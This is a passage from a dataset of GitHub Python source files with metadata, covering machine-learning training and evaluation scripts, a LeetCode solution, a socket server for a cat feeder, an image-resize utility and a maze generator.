torch.tensor([])\n for data in train_data:\n s = data\n mini_batch_size = s.shape[0]\n s = var(s).type(dtype)\n output = g_net(s)\n output = c_net(output)\n prediction = torch.cat((prediction, output))\n print(prediction.shape)\n return prediction\n\n\ndef feature_net_train(f_net, c_net, train_data, lr = 0.001, batch_size = 64, num_epochs = 5, output_path = './', validate = True):\n f_opt = torch.optim.Adam(f_net.parameters(), lr = lr)\n c_opt = torch.optim.Adam(c_net.parameters(), lr = lr)\n loss_fn = nn.CrossEntropyLoss()\n\n last_index = int(len(train_data.dataset) / batch_size)\n for epoch in range(0, num_epochs):\n total_loss = 0\n i = 0\n for data in train_data:\n s = data[0]\n l = data[1]\n i += 1\n if validate == True and i == last_index:\n break\n batchSize = s.shape[0]\n s = var(s).type(dtype)\n l = var(torch.LongTensor(l)) #.type(torch.LongTensor)\n output = f_net(s)\n output = c_net(output)\n loss = loss_fn(output, l)\n f_net.zero_grad()\n c_net.zero_grad()\n loss.backward()\n f_opt.step()\n c_opt.step()\n total_loss += loss\n\n print('Epoch:', epoch, 'Total Loss:', total_loss.cpu().item(), 'Last batch Loss:', loss.cpu().item())\n if epoch % 10 == 0:\n # torch.save(f_net.state_dict(), output_path+'saved_models/f_net_'+str(epoch/100)+'.pkl')\n # torch.save(c_net.state_dict(), output_path+'saved_models/l_net_'+str(epoch/100)+'.pkl')\n torch.save(f_net.state_dict(), output_path+'saved_models/f_net.pkl')\n torch.save(c_net.state_dict(), output_path+'saved_models/l_net.pkl')\n\n ## Validation accuracy on last index\n if validate:\n mini_batch_size = s.shape[0]\n s = var(s).type(dtype)\n l = var(torch.LongTensor(l)) #.type(dtype)\n output = f_net(s)\n output = c_net(output)\n _, predicted = torch.max(output.data, 1)\n # predicted = torch.LongTensor(predicted)\n accuracy = ((predicted == l).sum()) * 100 / mini_batch_size\n print('Epoch:', epoch, 'Accuracy:', accuracy.cpu().item())\n\ndef gan_train_domain_adapt(gen_net, dis_net, classify_net, real_data_loader, syn_data_loader, num_epochs = 10, batch_size = 64, lr = 0.001, output_path = './'):\n g_opt = torch.optim.Adam(gen_net.parameters(), lr = lr)\n d_opt = torch.optim.Adam(dis_net.parameters(), lr = lr)\n last_index = int(len(real_data_loader.dataset) / batch_size)\n for epoch in range(0, num_epochs):\n i = 0\n g_loss_total = 0\n d_loss_total = 0\n syn_img_iter = iter(syn_data_loader)\n syn_img_cnt = 0\n syn_img_len = len(syn_data_loader)\n for r_data in real_data_loader:\n # print(r_data[0].shape)\n real_img = r_data[0]\n real_label = r_data[1]\n i += 1\n if syn_img_cnt == syn_img_len:\n syn_img_iter = iter(syn_data_loader)\n syn_img_cnt = 0\n syn_img_cnt += 1\n syn_img = next(syn_img_iter)[0]\n mini_batch_size = syn_img.shape[0]\n syn_img = var(syn_img).type(dtype)\n real_img = var(real_img).type(dtype)\n\n if i == last_index:\n mini_batch_size = real_img.shape[0]\n real_image = var(real_img).type(dtype)\n real_label = var(torch.LongTensor(real_label)) #.type(dtype)\n output = gen_net(real_image)\n output = classify_net(output)\n _, predicted = torch.max(output.data, 1)\n\n accuracy = ((predicted == real_label).sum()) * 100 / mini_batch_size\n print('Epoch:', epoch, 'Accuracy:', accuracy.cpu().item())\n break\n\n # Discriminator training\n d_truth = dis_net(gen_net(syn_img))\n d_fake = dis_net(gen_net(real_img))\n d_loss = torch.mean(d_truth) - torch.mean(d_fake)\n\n dis_net.zero_grad()\n d_loss.sum().backward()\n d_opt.step()\n\n # Generator training\n g_fake = dis_net(gen_net(real_img))\n g_loss = -torch.mean(g_fake)\n gen_net.zero_grad()\n g_loss.backward()\n g_opt.step()\n d_loss_total += d_loss\n g_loss_total += g_loss\n\n #print('Epoch [{}/{}], Discriminator {}|{}, Generator {}|{}'.format(epoch+1, num_epochs, d_loss.item(), d_loss_total.item(), g_loss.item(), g_loss_total.item()))\n print('Epoch [{}/{}], Discriminator {}|{}, Generator {}|{}'.format(epoch+1, num_epochs, d_loss.cpu().item(), d_loss_total.cpu().item(), g_loss.cpu().item(), g_loss_total.cpu().item()))\n\n if epoch % 1== 0:\n torch.save(gen_net.state_dict(), output_path+'saved_models/g_net.pkl')\n torch.save(dis_net.state_dict(), output_path+'saved_models/d_net.pkl')\n","repo_name":"bhushan23/deep-domain-adaptation","sub_path":"1_latent_space_adaptation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44588916460","text":"class Solution:\n def minSubArrayLen(self, target: int, nums: List[int]) -> int:\n current_sum = 0\n window_size = float(inf)\n left = 0\n right = 0\n while right < len(nums):\n current_sum += nums[right]\n while(current_sum >= target):\n window_size = min(window_size,right-left+1)\n current_sum -= nums[left]\n left += 1\n right += 1\n return window_size if window_size != float(inf) else 0\n","repo_name":"Protype8/LeetCode","sub_path":"Sliding Window/Minimum Size Subarray Sum - LeetCode.py","file_name":"Minimum Size Subarray Sum - LeetCode.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21853369871","text":"import socket\r\nimport threading\r\nimport time\r\n\r\n# server info\r\nHEADER = 64\r\nPORT_PICO = 443\r\nPORT_WEB = 777\r\nSERVER = socket.gethostbyname(socket.gethostname())\r\nADDR_PICO = (SERVER, PORT_PICO)\r\nADDR_WEB = (SERVER, PORT_WEB)\r\nFORMAT = \"utf-8\"\r\nINSTRUCTION_INTERVAL = 5\r\nMAX_HISTORY_RECORD = 5\r\n\r\n# saved data\r\ncurrInst: str = \"None\"\r\ncurrFoodWeight: float = 0.0\r\nmaxFoodWeight: float = 100.0\r\nfeedSchdule: list = list() # (str: time, bool: done) time in format: \"hour minute\"\r\nfeedHistory: list = list() # (str: time, str: amount) time in format: \"year mon day hour minute\"\r\ncleanHistory: list = list() # (str: time) time in format: \"year mon day hour minute\"\r\nplay: bool = False\r\nplay_status : str = \"off\"\r\nmanualFeed = False\r\nmanualClean = False\r\n\r\nserver_pico = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_pico.bind(ADDR_PICO)\r\n\r\nserver_web = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_web.bind(ADDR_WEB)\r\n\r\npreviousTime:list = list()\r\n\r\ndef refreshSchedule():\r\n global feedSchdule\r\n for i in range(len(feedSchdule)):\r\n feedSchdule[i] = (feedSchdule[i][0],False)\r\n# struct_time to string for time comparison:hh mm ss\r\ndef time_transfer_day(localTime: time.struct_time):\r\n hour = localTime.tm_hour\r\n minute = localTime.tm_min\r\n second = localTime.tm_sec\r\n result = str(hour) + \" \" + str(minute) + \" \" + str(second)\r\n return result\r\n# struct_time to string for data storage: yyyy/mm/dd_hh:mm\r\ndef time_transfer_date(localTime: time.struct_time):\r\n year = localTime.tm_year\r\n month = localTime.tm_mon\r\n day = localTime.tm_mday\r\n hour = localTime.tm_hour\r\n minute = localTime.tm_min\r\n result = str(year) + \"/\" + str(month) + \"/\" + str(day) + \"_\" + str(hour) + \":\" + str(minute)\r\n return result\r\n\r\n# check if the difference between two time_string is within certain range\r\ndef time_in_range_day(time1: str, time2: str):\r\n time1_list = time1.split()\r\n time2_list = time2.split()\r\n \r\n time_1 = int(time1_list[0])*3600 + int(time1_list[1])*60 + int(time1_list[2])\r\n time_2 = int(time1_list[0])*3600 + int(time2_list[1])*60 + int(time2_list[2])\r\n return abs(time_1 - time_2) <= INSTRUCTION_INTERVAL * 2\r\n\r\n# sending message to certain connection with appropriate protocal header\r\ndef reply(conn, msg):\r\n message = msg.encode(FORMAT)\r\n # fixed length header before actual message\r\n msg_length = len(message)\r\n send_length = str(msg_length).encode(FORMAT)\r\n send_length += b' ' * (HEADER - len(send_length))\r\n \r\n conn.send(send_length)\r\n conn.send(message)\r\n\r\n# preparation before sending instruction to pico\r\ndef update_inst():\r\n now = time.localtime()\r\n now_str: str = time_transfer_day(now)\r\n # for schedule refresh\r\n instruct = \"None\"\r\n global manualFeed\r\n global manualClean\r\n global feedHistory\r\n global cleanHistory\r\n # manual command has higher prority than timed event\r\n manual: bool = False\r\n if manualFeed:\r\n # for history record\r\n amount = maxFoodWeight - currFoodWeight\r\n if amount < 0:\r\n amount = 0\r\n # record the action in a list\r\n feedHistory.append((time_transfer_date(now), str(amount)))\r\n # only keeps the last n records, remove the earlest record if it exeeds the limit\r\n if len(feedHistory) > MAX_HISTORY_RECORD:\r\n feedHistory = feedHistory[-MAX_HISTORY_RECORD:] \r\n # actual message\r\n instruct = \"feed\" + \" \" + str(maxFoodWeight)\r\n manual = True\r\n manualFeed = False\r\n elif manualClean:\r\n # record the action in a list\r\n cleanHistory.append(time_transfer_date(now))\r\n # only keeps the last n records, remove the earlest record if it exeeds the limit\r\n if len(cleanHistory) > MAX_HISTORY_RECORD:\r\n cleanHistory = cleanHistory[-MAX_HISTORY_RECORD:]\r\n # actual message\r\n instruct = \"clean\"\r\n manual = True\r\n manualClean = False\r\n \r\n if not manual: # shceduled feed\r\n global feedSchdule\r\n for i in range(len(feedSchdule)):\r\n # check if time has reached the setting feeding time\r\n if time_in_range_day(feedSchdule[i][0], now_str) and not feedSchdule[i][1]:\r\n # for history record\r\n amount = maxFoodWeight - currFoodWeight\r\n if amount >= 0:\r\n amount = 0\r\n # record the action in a list\r\n feedSchdule[i] = (feedSchdule[i][0], True)\r\n feedHistory.append((time_transfer_date(now), str(amount)))\r\n # only keeps the last n records, remove the earlest record if it exeeds the limit\r\n if len(feedHistory) > MAX_HISTORY_RECORD:\r\n feedHistory = feedHistory[-MAX_HISTORY_RECORD:]\r\n # construct actual message\r\n instruct = \"feed\" + \" \" + str(maxFoodWeight)\r\n break\r\n\r\n global play\r\n if play:\r\n instruct = \"play\" + \" \" + play_status\r\n play = False\r\n\r\n global currInst\r\n currInst = instruct\r\n# send instruction to pico\r\ndef sendInst(conn):\r\n update_inst()\r\n print(f\"To pico instrction: {currInst}\")\r\n reply(conn, currInst)\r\n# change local variables for instruction sending\r\ndef update_play(status):\r\n global play\r\n play = True\r\n global play_status\r\n play_status = status\r\n# change local variables for instruction sending\r\ndef update_max_food(amount):\r\n global maxFoodWeight\r\n if float(amount) > 0:\r\n maxFoodWeight = float(amount)\r\n# current food weight on hardware, getting from pico server connection\r\ndef updateWeight(weight):\r\n global currFoodWeight\r\n currFoodWeight = weight\r\n# change the feeding schdule\r\ndef updateSchedule(new_schedule: list, number: int):\r\n global feedSchdule\r\n feedSchdule = list()\r\n\r\n for i in range(number):\r\n time_list = new_schedule[i].split(\":\")\r\n hour = time_list[0]\r\n minute = time_list[1]\r\n second = \"0\"\r\n time = str(hour) + \" \" + str(minute) + \" \" + second\r\n feedSchdule.append((time, False))\r\n# send history info to web server in the form of: \"feed [feedNum] {[feedTime] [feedAmount]} clean [cleanNum] {[cleanTime]}\r\ndef sendHistory(conn):\r\n msg = \"\"\r\n feedNum = len(feedHistory)\r\n msg += \"feed \"\r\n msg += str(feedNum)\r\n\r\n for i in range(feedNum):\r\n t_str = feedHistory[i][0]\r\n amount: str = feedHistory[i][1]\r\n msg += \" \"\r\n msg += t_str\r\n msg += \" \"\r\n msg += amount\r\n\r\n cleanNum = len(cleanHistory)\r\n msg += \" clean \"\r\n msg += str(cleanNum)\r\n for i in range(cleanNum):\r\n t_str = cleanHistory[i]\r\n msg += \" \"\r\n msg += t_str\r\n print(f\"sendHistory {msg}\")\r\n reply(conn, msg)\r\n\r\n# send current schdule info to web server in the form of: \"[schduleNum] {[feedTime]}\r\ndef sendSchedule(conn):\r\n msg = \"\"\r\n pairNum = len(feedSchdule)\r\n for i in range(pairNum):\r\n time_str_list = feedSchdule[i][0].split()\r\n msg += time_str_list[0]\r\n msg += \":\"\r\n msg += time_str_list[1]\r\n if i != pairNum - 1 :\r\n msg += \" \"\r\n \r\n print(f\"sendSchedule {msg}\")\r\n reply(conn, msg)\r\n\r\n# interaction with pico W through socket + logic control\r\ndef handle_pico(conn, msg_list):\r\n command = msg_list[1]\r\n if command == \"instruction\":\r\n sendInst(conn)\r\n elif command == \"weight\":\r\n w = float(msg_list[2])\r\n updateWeight(w)\r\n\r\n# interaction with web server\r\ndef handle_web(conn,msg_list):\r\n command = msg_list[1]\r\n if command == \"feed\":\r\n global manualFeed\r\n manualFeed = True\r\n elif command == \"clean\":\r\n global manualClean\r\n manualClean = True\r\n elif command == \"update\":\r\n number = int(msg_list[2])\r\n new_schedule: list = msg_list[3:-1]\r\n amount = msg_list[-1]\r\n updateSchedule(new_schedule, number)\r\n update_max_food(amount)\r\n elif command == \"history\":\r\n sendHistory(conn)\r\n elif command == \"schedule\":\r\n sendSchedule(conn)\r\n elif command == \"play\":\r\n status = msg_list[2]\r\n update_play(status)\r\n \r\n# general message receive from client\r\ndef handle_client(conn, addr):\r\n print(f\"New connection {addr} connected\")\r\n connected = True\r\n while connected:\r\n msg_length = conn.recv(HEADER).decode(FORMAT)\r\n if msg_length:\r\n msg_length = int(msg_length)\r\n msg = conn.recv(msg_length).decode(FORMAT)\r\n print(*msg)\r\n msg_list = msg.split()\r\n client_id = msg_list[0]\r\n # recognize different devices by message fisrt word: part of protocal\r\n if client_id == \"pico\":\r\n handle_pico(conn, msg_list)\r\n elif client_id == \"web\":\r\n handle_web(conn, msg_list)\r\n else:\r\n print(\"unknown connection device\") \r\n conn.close()\r\n\r\n# server action\r\ndef start():\r\n # start both servers listening to their ports\r\n server_pico.listen()\r\n server_web.listen()\r\n pico_connected = False\r\n while True:\r\n # can only have one pico connection\r\n if not pico_connected: \r\n conn, addr = server_pico.accept()\r\n pico_connected = True\r\n # communicate with client on a new thread\r\n thread = threading.Thread(target=handle_client, args=(conn, addr))\r\n thread.start()\r\n print(f\"Active connection: {threading.activeCount() - 1}\" )\r\n # could have multiple web connections\r\n conn1, addr1 = server_web.accept()\r\n # communicate with client on a new thread\r\n thread1 = threading.Thread(target=handle_client, args=(conn1, addr1))\r\n thread1.start()\r\n print(f\"Active connection: {threading.activeCount() - 1}\" )\r\n\r\nprint(\"Server is starting...\")\r\nstart()\r\n","repo_name":"BobbbbbZ/CPEN-291-Project2-Automated-cat-feeding-and-remote-interaction-system","sub_path":"VM backend server.py","file_name":"VM backend server.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72126850681","text":"from PIL import Image\nimport os\nimport sys\nargs = sys.argv\nbasewidth = int(args[1])\nbaseheigth = int(args[2])\npath=args[3]\nprint(\"Resizing all png images in \" + path + \" to [\" +str(basewidth) + \"x\"+str(baseheigth)+ \"] .\")\nfiles=[]\n#m = input(\"Mode (r/s) > \")\nfor r, d, f in os.walk(path):\n for file in f:\n if '.png' in file:\n if '.mcmeta' in file:\n continue;\n files.append(os.path.join(r, file))\n\n\nfor f in files:\n print(f)\n img = Image.open(f)\n img=img.resize((basewidth,baseheigth),Image.ANTIALIAS)\n img.save(f)\n print(\"saved : \" + f)\n","repo_name":"ClientCrash/ImgResize","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15001189361","text":"MAVS = set([\"Dirk\", \"Nowitzki\", \"mavs\", \"JET\", \"Terry\", \"Barea\", \n \"jjbareapr\", \"Tyson\", \"Chandler\", \"Marion\", \"Matrix\", \n \"Custodian\", \"Kidd\", \"Stojakovic\", \"Peja\", \"Carlisle\", \n \"Dallas\", \"Maverick\"])\nHEAT = set([\"Bosh\", \" Wade \", \"LBJ\", \"Lebron\", \"Heat \", \"HEATBIH\", \n \"Cavs\", \"Cleveland\", \"Cavaliers\", \"Bibby\", \n \"Dwyane\", \"Miller\", \"Chalmers\", \"Udonis\", \"Haslem\",\n \"Spolestra\"])\nFINALS = set([\"Finals\", \"NBA\", \"Stern\", \"Champions\", \"champs\", \n \"trophy\", \"quarter\"])","repo_name":"acompa/maps.NBA","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"hr","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34957524632","text":"# coding: utf-8\n\"\"\"\nHelper functions for model evaluation\n\"\"\"\n\nimport keras.backend as K\nfrom keras.callbacks import Callback\nimport numpy as np\nfrom sklearn.metrics import (precision_score, recall_score, f1_score)\nfrom sklearn.metrics import roc_auc_score\n\n\ndef get_coefs(word, *arr): \n \"\"\"\n \"\"\"\n return word, np.asarray(arr, dtype='float32')\n\nclass RocAucEvaluation(Callback):\n \"\"\"\n \"\"\"\n def __init__(self, logger, validation_data=(), interval=1):\n super(Callback, self).__init__()\n\n self.interval = interval\n self.X_val, self.y_val = validation_data\n self.logger = logger\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X_val, verbose=0)\n score = roc_auc_score(self.y_val, y_pred)\n self.logger.info(\"\\n ROC-AUC - epoch: %d - score: %.6f \\n\" % (epoch+1, score))\n\nclass Metrics(Callback):\n \"\"\"\n \"\"\"\n\n def __init__(self, logger):\n self.logger = logger\n self.dev_f1s = []\n self.dev_recalls = []\n self.dev_precisions = []\n\n def on_train_begin(self, logs={}):\n self.dev_f1s = []\n self.dev_recalls = []\n self.dev_precisions = []\n\n def on_epoch_end(self, epoch, logs={}):\n dev_predict = (np.asarray(self.model.predict(self.model.validation_data[0]))).round()\n dev_targ = self.model.validation_data[1]\n\n self.dev_f1s.append(f1_score(dev_targ, dev_predict, average='micro'))\n self.dev_recalls.append(recall_score(dev_targ, dev_predict))\n self.dev_precisions.append(precision_score(dev_targ, dev_predict))\n\n f1 = f1_score(dev_targ, dev_predict, average='micro')\n precision = precision_score(dev_targ, dev_predict),\n recall = recall_score(dev_targ, dev_predict)\n\n self.logger.info(\"Metrics: - dev_f1: %s — dev_precision: %s — dev_recall %s\", f1, precision, recall)\n return\n\ndef f1(y_true, y_pred):\n \"\"\"\n Use Recall and precision metrics to calculate harmonic mean (f1)\n\n Only computes a batch-wise average of recall.\n\n Computes the recall, a metric for multi-label classification of\n how many relevant items are selected.\n \"\"\"\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n recall = true_positives / (possible_positives + K.epsilon())\n f1 = 2*((precision*recall)/(precision+recall))\n\n return f1\n","repo_name":"ivyleavedtoadflax/kaggle-toxic","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8972089821","text":"import random\n\nlaberinto = []\n\nfor pocicionFila in range( 0, 7 ):\n fila = []\n for pocicionColumna in range(0,11):\n fila.append(\"#\")\n laberinto.append(fila)\n\nfilaAleatoria = random.randint(0,6)\ncolumnaAleatoria = random.randint(0,10)\n\nlaberinto[ filaAleatoria ][ columnaAleatoria ] = \" \"\n\nnumeroParedes = 30\nnumeroEspacios = 77 - numeroParedes\n\nx = filaAleatoria\ny = columnaAleatoria\n\n# ----\nwhile True:\n if(numeroEspacios == 1):\n break\n\n arriba = [x-1, y]\n abajo = [x+1, y]\n izquierda = [x, y-1]\n derecha = [x, y+1]\n\n movientos = [arriba, abajo, izquierda, derecha]\n\n numeroAleatorio = random.randint(0,3)\n\n sgtMovimiento = movientos[ numeroAleatorio ]\n\n while True:\n if( sgtMovimiento[0] >= 0 and sgtMovimiento[0] < 7 and sgtMovimiento[1] >= 0 and sgtMovimiento[1] < 11):\n\n if(laberinto[ sgtMovimiento[0] ] [ sgtMovimiento[1] ] == \"#\"):\n laberinto[sgtMovimiento[0]][sgtMovimiento[1]] = \" \"\n x = sgtMovimiento[0]\n y = sgtMovimiento[1]\n numeroEspacios = numeroEspacios - 1\n break\n elif( laberinto[ sgtMovimiento[0] ] [ sgtMovimiento[1] ] == \" \" ):\n x = sgtMovimiento[0]\n y = sgtMovimiento[1]\n break\n else:\n numeroAleatorio = random.randint(0,len(movientos)-1 )\n sgtMovimiento = movientos[ numeroAleatorio ]\n\n # print(\"----------------\")\n # for fila in laberinto:\n # print(\"\".join(fila))\n\n\n\n\nfor fila in laberinto:\n print(\"\".join(fila))\n","repo_name":"jhonnyckuno/Lab-Sis420","sub_path":"P01.py","file_name":"P01.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37594709238","text":"import numpy as np\nfrom shapely.geometry.polygon import LineString\nfrom base.Distances import lineseg_dists\nfrom scipy import stats\n\n\nclass RansacIsochrone:\n def __init__(self, shift_x=0.1, shift_y=-0.75):\n self.shift_x = shift_x\n self.shift_y = shift_y\n\n def create_multiline(self, points, shift_length=1e3):\n # Compute unit vector in opposite direction of line shift\n vec = np.array([-self.shift_x, -self.shift_y])\n # normalize vector to unit length\n vec /= np.linalg.norm(vec)\n # create line with points as start point and shifted points as end point\n line = np.stack([points, points + vec*shift_length], axis=1)\n return line\n\n def intersection(self, points, line):\n A = self.create_multiline(points)\n res = np.array([line.intersects(LineString(a)) for a in A], dtype=int)\n return res\n\n def is_inside_main_and_binaries(self, points, isochrone):\n # Compute binary line\n binaries = np.copy(isochrone)\n binaries[:, 0] += self.shift_x\n binaries[:, 1] += self.shift_y\n # Convert into shapely linestrings\n isoline = LineString(isochrone)\n binaryline = LineString(binaries)\n # Compute intersections\n nb_intersections = self.intersection(points, isoline) + self.intersection(points, binaryline)\n return nb_intersections == 1\n\n def closest_point_on_isochrone_and_binary(self, points, isochrone):\n # closest point on isochrone\n closest_points_sl = lineseg_dists(points, isochrone[1:], isochrone[:-1])\n # closest point on binary isochrone\n binaries = np.copy(isochrone)\n binaries[:, 0] += self.shift_x\n binaries[:, 1] += self.shift_y\n closest_points_bl = lineseg_dists(points, binaries[1:], binaries[:-1])\n # compute minimum between both\n dists_sl = np.linalg.norm(closest_points_sl - points, axis=1)\n dists_bl = np.linalg.norm(closest_points_bl - points, axis=1)\n closest_isochrone_arg = np.argmin(np.stack([dists_sl, dists_bl]), axis=0)\n cond = closest_isochrone_arg == 0\n closest_points = np.where(cond[:, None], closest_points_sl, closest_points_bl)\n return closest_points\n\n @staticmethod\n def n_sigma_distance(n_sigma):\n \"\"\"Mahanobolis distance to n sigma conversion\"\"\"\n quantile = stats.norm.cdf(n_sigma) - stats.norm.cdf(-n_sigma)\n return np.sqrt(-2 * np.log(1 - quantile))\n\n def is_inside_Nsigma_radius(self, points, std_devs, isochrone, n_sigma=3):\n \"\"\"Check if points are N standard deviations from isochrone\n Assumes diagonal covariance matrix\n \"\"\"\n # Compute component wise differences\n x1_y1, x2_y2 = np.square(points - self.closest_point_on_isochrone_and_binary(points, isochrone)).T\n # Get standard deviations\n std_x1, std_y1 = std_devs.T\n # Underestimation correction\n uc = 2\n # Compute Mahalanobolis distance\n dists = np.sqrt((x1_y1 / (uc * std_x1**2)) + (x2_y2 / (uc * std_y1**2)))\n # dists = np.sqrt((x1_y1 / std_x1) + (x2_y2 / std_y1))\n # Compute N sigma radius\n is_still_inside = dists < self.n_sigma_distance(n_sigma)\n return is_still_inside\n\n def fit(self, isochrone, points, std_devs, n_sigma=3):\n # check if points are inside main isochrone and binary isochrone\n is_inside = self.is_inside_main_and_binaries(points, isochrone)\n # check if points are inside N sigma radius\n is_still_inside = self.is_inside_Nsigma_radius(points, std_devs, isochrone, n_sigma=n_sigma)\n # combine both conditions\n is_still_inside = is_still_inside | is_inside\n return is_still_inside\n","repo_name":"ratzenboe/Chronos","sub_path":"base/RANSAC.py","file_name":"RANSAC.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4975363143","text":"import os\nfrom os import PRIO_PGRP\nimport numpy as np\nfrom sklearn import metrics\nimport shutil\n\ndef eval_res(pred, label, isShow=False, eval_type=\"ERR_strict\",eval_val='self', thresh=None):\n\n name2idx = {}\n idx = 0\n data = [] \n with open(pred, \"r\") as f:\n for line in f.readlines():\n name, score = line.strip().split(\" \")\n # name = os.path.join('train',name)\n name2idx[name] = idx\n data.append([float(score), -1])\n idx += 1\n with open(label, \"r\") as f:\n for line in f.readlines():\n name, label = line.strip().split(\" \") #0 3 -1 [0:real] [1:mask1] [3:mask3] [-1:unknown]\n if name in name2idx:\n if eval_val=='self':\n data[name2idx[name]][1] = 1-int(label)\n else:\n data[name2idx[name]][1] = int(label)\n else:\n print(\"{} not in the predict txt\".format(name))\n data = np.array(data)\n if thresh is not None:\n thres = thresh\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0)))\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3)))\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. * FP / (np.sum((data[:, 1] == 1) | (data[:, 1] == 3)))\n ACER = (BPCER + APCER) / 2.\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(thres, APCER, BPCER, ACER))\n \n return thres, APCER, BPCER, ACER\n\n if eval_type == \"min_acer\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0))) + np.sum(data[:, 1]==-1)\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3))) + np.sum(data[:, 1]==-1)\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. * FP / (np.sum(data[:, 1] != 0))\n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n idx = np.argmin(scores, axis=0)[3]\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n elif eval_type == \"ERR\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & (data[:, 1] == 0))\n FP = np.sum((data[:, 0] >= thres) & (data[:, 1] != 0))\n BPCER = 1. * FN / np.sum(data[:, 1] == 0) #FNR / FRR\n APCER = 1. * FP / np.sum(data[:, 1] != 0) #FPR / FAR\n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n delta = abs(scores[:, 1] - scores[:, 2])\n idx = np.argmin(delta, axis=0)\n\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n elif eval_type == \"ERR_strict\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0))) + np.sum(data[:, 1]==-1)\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3))) + np.sum(data[:, 1]==-1)\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. * FP / (np.sum(data[:, 1] != 0))\n \n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n delta = abs(scores[:, 1] - scores[:, 2])\n idx = np.argmin(delta, axis=0)\n\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1]*100, scores[idx, 2]*100, scores[idx, 3]*100))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n return 0, 0, 0, 0\n\ndef calc_acc(pred_res,label_gt,eval_val=\"self\"):\n root_pth = '../raw_data/phase1'\n target_data = '../wrong_pic'\n pred_dic = {}\n label_dic = {}\n with open(pred_res, 'r') as f:\n lines = f.readlines()\n for line in lines:\n name,pred, *_ = line.strip().split(' ')\n # name = os.path.join('train',name)\n # print(name)\n if pred > str(0.5):\n pred = 0\n else:\n pred = 1\n # print(name,pred)\n # print(pred)\n pred_dic[name] = str(pred)\n\n with open(label_gt, 'r') as f:\n lines = f.readlines()\n for line in lines:\n name,pred,*_ = line.strip().split(' ')\n # print(name,pred)\n if eval_val=='self':\n pred = 1-int(pred)\n else:\n if int(pred)>1:\n pred = 1\n label_dic[name] = str(pred)\n # if eval_val=='offical':\n res_txt = open('./se_101.txt', 'w')\n count = 0\n # print(pred_dic,label_dic)\n for name in pred_dic.keys():\n # print(name)\n # name = '%04d.png'%(i+1)\n # print(name)\n if int(pred_dic[name])!=int(label_dic[name]):\n # if eval_val=='self':\n # shutil.copyfile(os.path.join(root_pth,name),os.path.join(target_data,\"_\".join(name.split('/'))))\n # else:\n res_txt.write(name+' '+pred_dic[name]+' '+label_dic[name]+'\\n')\n count+=1\n\n print(count / len(pred_dic) , count)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"tommyjiang/iccv-2021-anti-spoofing","sub_path":"anti_code/eval_acer.py","file_name":"eval_acer.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71856028280","text":"# -*-coding:utf-8 -*-\n\nimport importlib\nimport tensorflow.compat.v1 as tf\nfrom argparse import 